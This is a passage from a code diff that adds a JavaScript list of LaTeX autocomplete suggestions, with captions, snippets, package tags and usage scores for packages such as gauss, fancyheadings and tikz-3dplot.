+ }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'gauss-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'gauss-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'gauss-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'gauss-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'gauss-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'gauss-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'gauss-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'gauss-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'gauss-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'gauss-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'gauss-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'gauss-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'gauss-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'gauss-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'gauss-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'gauss-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'gauss-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'gauss-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'gauss-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'gauss-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'gauss-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'gauss-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'gauss-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'gauss-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'gauss-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'gauss-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'gauss-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'gauss-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'gauss-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'gauss-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'gauss-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'gauss-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'gauss-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'gauss-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'gauss-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'gauss-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'gauss-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'gauss-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'gauss-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'gauss-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'gauss-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'gauss-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'gauss-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'gauss-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'gauss-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'gauss-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'gauss-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'gauss-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'gauss-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'gauss-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'gauss-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'gauss-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'gauss-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'gauss-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'gauss-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'gauss-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'gauss-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'gauss-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'gauss-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'gauss-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'gauss-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'gauss-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'gauss-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'gauss-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'gauss-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'gauss-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'gauss-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'gauss-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'gauss-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'gauss-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'gauss-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'gauss-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'gauss-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'gauss-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'gauss-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'gauss-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'gauss-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'gauss-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'gauss-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'gauss-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'gauss-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'gauss-cmd', + score: 0.0063276692758974925, + }, + ], + fancyref: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'fancyref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'fancyref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'fancyref-cmd', + score: 0.008565354665444157, + }, + ], + eufrak: [ + { + caption: '\\mathfrak{}', + snippet: '\\mathfrak{$1}', + meta: 'eufrak-cmd', + score: 0.025213895825856578, + }, + { + caption: '\\mathfrak', + snippet: '\\mathfrak', + meta: 'eufrak-cmd', + score: 0.025213895825856578, + }, + ], + fixme: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'fixme-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'fixme-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'fixme-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'fixme-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'fixme-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'fixme-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\endverbatim', + snippet: '\\endverbatim', + meta: 'fixme-cmd', + score: 0.0022216421267780076, + }, + { + caption: '\\verbatim', + snippet: '\\verbatim', + meta: 'fixme-cmd', + score: 0.0072203369120285256, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'fixme-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'fixme-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\par', + snippet: '\\par', + meta: 'fixme-cmd', + score: 0.413853376001159, + }, + { + caption: '\\verbatiminput{}', + snippet: '\\verbatiminput{$1}', + meta: 'fixme-cmd', + score: 0.0024547099784948665, + }, + { + caption: '\\verbatiminput', + snippet: '\\verbatiminput', + meta: 'fixme-cmd', + score: 0.0024547099784948665, + }, + ], + 'pgf-umlsd': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-umlsd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgf-umlsd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgf-umlsd-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgf-umlsd-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgf-umlsd-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgf-umlsd-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-umlsd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgf-umlsd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgf-umlsd-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'pgf-umlsd-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgf-umlsd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgf-umlsd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgf-umlsd-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgf-umlsd-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgf-umlsd-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-umlsd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgf-umlsd-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.2864294797053033, + }, + ], + tgadventor: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgadventor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgadventor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgadventor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgadventor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgadventor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgadventor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgadventor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgadventor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tgadventor-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tgadventor-cmd', + score: 0.021170869458413965, + }, + ], + fancyheadings: [ + { + caption: '\\lhead{}', + snippet: '\\lhead{$1}', + meta: 'fancyheadings-cmd', + score: 0.05268978171228714, + }, + { + caption: '\\chaptermark', + snippet: '\\chaptermark', + meta: 'fancyheadings-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\chaptermark{}', + snippet: '\\chaptermark{$1}', + meta: 'fancyheadings-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\fancypagestyle{}{}', + snippet: '\\fancypagestyle{$1}{$2}', + meta: 'fancyheadings-cmd', + score: 0.009430919590937878, + }, + { + caption: '\\footrule', + snippet: '\\footrule', + meta: 'fancyheadings-cmd', + score: 0.0010032754348913366, + }, + { + caption: '\\footrule{}', + snippet: '\\footrule{$1}', + meta: 'fancyheadings-cmd', + score: 0.0010032754348913366, + }, + { + caption: '\\fancyfoot[]{}', + snippet: '\\fancyfoot[$1]{$2}', + meta: 'fancyheadings-cmd', + score: 0.024973618823189894, + }, + { + caption: '\\fancyfoot{}', + snippet: '\\fancyfoot{$1}', + meta: 'fancyheadings-cmd', + score: 0.024973618823189894, + }, + { + caption: '\\fancyfootoffset[]{}', + snippet: '\\fancyfootoffset[$1]{$2}', + meta: 'fancyheadings-cmd', + score: 0.0015373246231684555, + }, + { + caption: '\\fancyfootoffset{}', + snippet: '\\fancyfootoffset{$1}', + meta: 'fancyheadings-cmd', + score: 0.0015373246231684555, + }, + { + caption: '\\footruleskip', + snippet: '\\footruleskip', + meta: 'fancyheadings-cmd', + score: 0.000830117957327721, + }, + { + caption: '\\fancyheadoffset[]{}', + snippet: '\\fancyheadoffset[$1]{$2}', + meta: 'fancyheadings-cmd', + score: 0.0016786568695309166, + }, + { + caption: '\\fancyheadoffset{}', + snippet: '\\fancyheadoffset{$1}', + meta: 'fancyheadings-cmd', + score: 0.0016786568695309166, + }, + { + caption: '\\iffloatpage{}{}', + snippet: '\\iffloatpage{$1}{$2}', + meta: 'fancyheadings-cmd', + score: 6.606286310833368e-5, + }, + { + caption: '\\cfoot{}', + snippet: '\\cfoot{$1}', + meta: 'fancyheadings-cmd', + score: 0.013411641301057813, + }, + { + caption: '\\subsectionmark', + snippet: '\\subsectionmark', + meta: 'fancyheadings-cmd', + score: 3.1153423008593836e-5, + }, + { + caption: '\\footrulewidth', + snippet: '\\footrulewidth', + meta: 'fancyheadings-cmd', + score: 0.011424740897486949, + }, + { + caption: '\\fancyhfoffset[]{}', + snippet: '\\fancyhfoffset[$1]{$2}', + meta: 'fancyheadings-cmd', + score: 3.741978601121172e-5, + }, + { + caption: '\\rhead{}', + snippet: '\\rhead{$1}', + meta: 'fancyheadings-cmd', + score: 0.022782817416731292, + }, + { + caption: '\\fancyplain{}{}', + snippet: '\\fancyplain{$1}{$2}', + meta: 'fancyheadings-cmd', + score: 0.007402339896386138, + }, + { + caption: '\\rfoot{}', + snippet: '\\rfoot{$1}', + meta: 'fancyheadings-cmd', + score: 0.013393817825547868, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'fancyheadings-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\plainheadrulewidth', + snippet: '\\plainheadrulewidth', + meta: 'fancyheadings-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\baselinestretch', + snippet: '\\baselinestretch', + meta: 'fancyheadings-cmd', + score: 0.03225350148161425, + }, + { + caption: '\\lfoot{}', + snippet: '\\lfoot{$1}', + meta: 'fancyheadings-cmd', + score: 0.00789399846642229, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'fancyheadings-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'fancyheadings-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\fancyhf{}', + snippet: '\\fancyhf{$1}', + meta: 'fancyheadings-cmd', + score: 0.02314618933449356, + }, + { + caption: '\\sectionmark', + snippet: '\\sectionmark', + meta: 'fancyheadings-cmd', + score: 0.005008938879210868, + }, + { + caption: '\\fancyhead[]{}', + snippet: '\\fancyhead[$1]{$2}', + meta: 'fancyheadings-cmd', + score: 0.039101068064744296, + }, + { + caption: '\\fancyhead{}', + snippet: '\\fancyhead{$1}', + meta: 'fancyheadings-cmd', + score: 0.039101068064744296, + }, + { + caption: '\\nouppercase{}', + snippet: '\\nouppercase{$1}', + meta: 'fancyheadings-cmd', + score: 0.006416387071584083, + }, + { + caption: '\\nouppercase', + snippet: '\\nouppercase', + meta: 'fancyheadings-cmd', + score: 0.006416387071584083, + }, + { + caption: '\\headrule', + snippet: '\\headrule', + meta: 'fancyheadings-cmd', + score: 0.0008327432627715623, + }, + { + caption: '\\headrule{}', + snippet: '\\headrule{$1}', + meta: 'fancyheadings-cmd', + score: 0.0008327432627715623, + }, + { + caption: '\\chead{}', + snippet: '\\chead{$1}', + meta: 'fancyheadings-cmd', + score: 0.00755042164734884, + }, + { + caption: '\\headrulewidth', + snippet: '\\headrulewidth', + meta: 'fancyheadings-cmd', + score: 0.02268137935335823, + }, + ], + 'tikz-3dplot': [ + { + caption: '\\tdplotsetmaincoords{}{}', + snippet: '\\tdplotsetmaincoords{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.00021728148272883815, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-3dplot-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'tikz-3dplot-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-3dplot-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-3dplot-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikz-3dplot-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikz-3dplot-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikz-3dplot-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-3dplot-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-3dplot-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-3dplot-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikz-3dplot-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-3dplot-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikz-3dplot-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikz-3dplot-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-3dplot-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 